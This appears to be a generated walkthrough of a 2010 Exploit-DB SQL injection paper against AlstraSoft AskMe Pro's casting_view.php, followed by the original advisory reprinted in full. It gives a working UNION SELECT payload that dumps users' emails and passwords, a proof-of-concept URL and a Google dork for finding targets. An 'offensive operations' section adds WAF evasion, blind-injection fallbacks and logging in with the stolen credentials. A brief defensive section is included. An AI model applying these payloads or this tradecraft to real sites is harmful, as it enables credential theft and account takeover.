Modelbook 'casting_view.php' SQL Injection: Extracting User Credentials

Modelbook 'casting_view.php' SQL Injection: Extracting User Credentials
What this paper is
This paper details a SQL injection vulnerability found in the casting_view.php file of the AlstraSoft AskMe Pro web application, specifically within its "Modelbook" feature. The vulnerability allows an attacker to manipulate database queries to extract sensitive information, such as email addresses and passwords from the users table.
Simple technical breakdown
The core of the vulnerability lies in how the casting_view.php script handles user input, specifically the adnum parameter. Instead of properly sanitizing this input, the script directly incorporates it into a SQL query. An attacker can craft a malicious string for the adnum parameter that, when inserted into the query, alters its intended behavior. This allows the attacker to inject additional SQL commands, effectively hijacking the original query to perform unauthorized actions, like selecting and displaying data from the users table.
Complete code and payload walkthrough
The provided exploit is a URL-based payload. There is no explicit code block for the vulnerable application's PHP script in the paper, but the exploit string itself reveals the attack vector.
Exploit Payload:
-9999+union+all+select+1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10+from+users--Let's break down this payload:
-9999: This is likely an attempt to ensure that the original query, which probably expects a positive integer foradnum, fails or returns no results. By providing a highly negative number, the attacker aims to isolate the effect of their injected SQL.+union+all+select+: This is the core of the SQL injection.UNION ALLis a SQL operator that combines the result set of two or moreSELECTstatements.ALLmeans that duplicate rows are also returned.SELECTis the standard SQL command to retrieve data from a database.
1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10: This part specifies the columns to be selected in theUNION ALLquery.1,3,4,5,6,7,8,9,10: These are literal values. They are included to match the expected number of columns in the original query. The original query likely selects a specific number of columns from a table related to advertisements or listings. The attacker needs to provide the same number of columns in their injectedSELECTstatement for theUNION ALLto work.group_concat(email,char(58),pass)v3n0m: This is the crucial part that extracts the sensitive data.group_concat(): This is a MySQL function that concatenates non-NULL values from a group into a single string. It's used here to combine multiple rows of email and password into a single output string.email: This refers to theemailcolumn in theuserstable.char(58): This is the ASCII character code for a colon (:). It's used as a delimiter between the email and the password in the concatenated output.pass: This refers to thepasscolumn in theuserstable.v3n0m: This is a string literal. It appears to be a marker or identifier added by the author of the exploit. It will be displayed as a column name in the output.
+from+users--: This specifies the table to retrieve data from and terminates the query.from+users: This indicates that the data should be fetched from theuserstable.--: This is a SQL comment. It comments out the rest of the original query, preventing any syntax errors that might arise from the original query's remaining clauses.
Mapping list:
-9999: Ensures original query likely fails, isolating injected query.+union+all+select+: Combines results of original query (or its failed state) with attacker's query.1,3,4,5,6,7,8,9,10: Placeholder columns to match the expected number of columns in the original query.group_concat(email,char(58),pass): Extracts and concatenatesemailandpassfrom theuserstable, separated by a colon.v3n0m: A custom identifier string.from+users: Specifies the target table for data extraction.--: Comments out the remainder of the original SQL query.
SQLi p0c (Proof of Concept URL):
http://127.0.0.1/[path]/casting_view.php?adnum=[SQLi]This shows how the exploit payload is appended to the adnum parameter in the URL. The [SQLi] placeholder would be replaced by the exploit string.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server and knowledge of the web application's URL structure. No elevated privileges on the server itself are initially required, as this is a web-based attack.
- Lab Preconditions:
- A local or remote web server hosting a vulnerable version of AlstraSoft AskMe Pro.
- The
casting_view.phpscript must be accessible and contain the SQL injection vulnerability. - A database connected to the web application containing a
userstable withemailandpasscolumns. - The
adnumparameter must be present and vulnerable incasting_view.php. - The database must be MySQL or a compatible database that supports
UNION ALLandGROUP_CONCAT.
- Tooling Assumptions:
- A web browser for manual testing or reconnaissance.
- A vulnerability scanner (e.g., Burp Suite, OWASP ZAP) to automate the discovery and exploitation of SQL injection vulnerabilities.
- A command-line tool like
curlorwgetfor crafting and sending HTTP requests. - A SQL client (e.g., MySQL Workbench,
mysqlCLI) to verify extracted credentials if needed (though the exploit directly outputs them).
- Execution Pitfalls:
- Incorrect Column Count: If the number of columns in the injected
SELECTstatement (1, 3, 4, 5, 6, 7, 8, 9, 10, and thegroup_concatcolumn) does not match the number of columns in the original query, theUNION ALLwill fail. This is a common point of failure. The attacker might need to perform anORDER BYclause attack to determine the correct column count. - Database Type/Version: The exploit relies on MySQL-specific functions like
GROUP_CONCAT. If the target database is not MySQL (e.g., PostgreSQL, SQL Server), the payload will need to be adapted. - WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the
UNION ALLsyntax or theGROUP_CONCATfunction. Evasion techniques (e.g., encoding, using different delimiters, alternative SQL injection methods) might be necessary. - URL Encoding: Spaces and special characters in the payload must be URL-encoded (e.g.,
+for space,%3Afor colon). The exploit uses+for spaces, which is common but might need adjustment. - Application Logic: The
adnumparameter might be used in a way that prevents simple injection (e.g., it's not directly concatenated into aSELECTstatement, or it's heavily validated). - Data Format: The
passcolumn might be hashed. The extracted data would then be hashes, requiring further cracking.
- Incorrect Column Count: If the number of columns in the injected
- Tradecraft Considerations:
- Reconnaissance: Use Google Dorks (
allinurl:casting_view.php?adnum=) to find potential targets. - Enumeration: Before injecting the full payload, test for basic SQL injection by injecting single quotes (
') or other special characters to observe error messages or altered page content. - Blind SQLi: If direct output is not possible (e.g., due to WAFs or error suppression), consider blind SQL injection techniques to exfiltrate data character by character.
- Post-Exploitation: Once credentials are obtained, use them to log into the application and explore further.
- Reconnaissance: Use Google Dorks (
Where this was used and when
- Application: AlstraSoft AskMe Pro (Modelbook feature).
- Approximate Year: The exploit was published on April 28, 2010. Therefore, this vulnerability was likely actively exploited around this time.
- Context: Web applications, specifically those with user management and community features, are common targets for SQL injection. This exploit targets a specific parameter (
adnum) within a PHP script (casting_view.php) that was likely used to display advertisement details or user profiles.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is paramount. All user-supplied input, especially parameters in URLs, form data, and cookies, must be rigorously validated and sanitized before being used in database queries. Use parameterized queries (prepared statements) to prevent SQL injection entirely.
- Least Privilege Principle: The database user account used by the web application should have only the minimum necessary privileges. It should not have permissions to access sensitive tables like
usersif it's not required for its core function. - Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a layer of defense against common SQL injection patterns. Keep WAF rules updated.
- Regular Patching and Updates: Keep web applications and their underlying frameworks and databases updated to patch known vulnerabilities.
- Error Handling: Configure applications to not display detailed database error messages to end-users, as these can provide valuable information to attackers. Log errors server-side.
- Code Auditing: Regularly audit web application code for common vulnerabilities like SQL injection.
ASCII visual (if applicable)
This exploit is a direct manipulation of a web request and its interaction with a backend database. An ASCII visual can illustrate the flow of data.
+-----------------+ +---------------------+ +-----------------+
| Attacker's |----->| Web Server |----->| Database Server |
| Browser/Tool | | (casting_view.php) | | (MySQL) |
+-----------------+ +---------------------+ +-----------------+
| | |
| 1. Malicious URL | |
| (adnum=[SQLi]) | |
|----------------------->| |
| | 2. Vulnerable Script |
| | constructs query |
| | with injected SQL |
| |--------------------------->|
| | | 3. Query executed
| | | (UNION ALL SELECT...)
| | |--------------------------->
| | | 4. Sensitive data
| | | (email:pass) returned
| | |<--------------------------
| | 5. Data displayed/ |
| | returned to attacker |
|<-----------------------| |
| |
+-----------------+ +-----------------+
| Attacker sees | | Database state |
| credentials | | unchanged (except|
+-----------------+ | data read) |
+-----------------+Source references
- Paper ID: 12443
- Paper Title: Modelbook - 'casting_view.php' SQL Injection
- Author: v3n0m
- Published: 2010-04-28
- Paper URL: https://www.exploit-db.com/papers/12443
- Raw Exploit URL: https://www.exploit-db.com/raw/12443
Original Exploit-DB Content (Verbatim)
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
Modelbook (casting_view.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 29-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : AlstraSoft AskMe Pro
Vendor : http://www.rocky.nu/
Price : $100.00 USD
Google Dork : allinurl:casting_view.php?adnum=
Overview :
Modelbook is a full featured web community script. A very extensive and
powerful web application written in PHP. 100% Open Source Code, no Encryption.
----------------------------------------------------------------
Exploit:
~~~~~~~
-9999+union+all+select+1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10+from+users--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/casting_view.php?adnum=[SQLi]
----------------------------------------------------------------
Shoutz:
~~~~
- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (baru tau gw ur klo lo ternyata pernah curhat sambil nangis² bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office "except ahong (fuck you off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------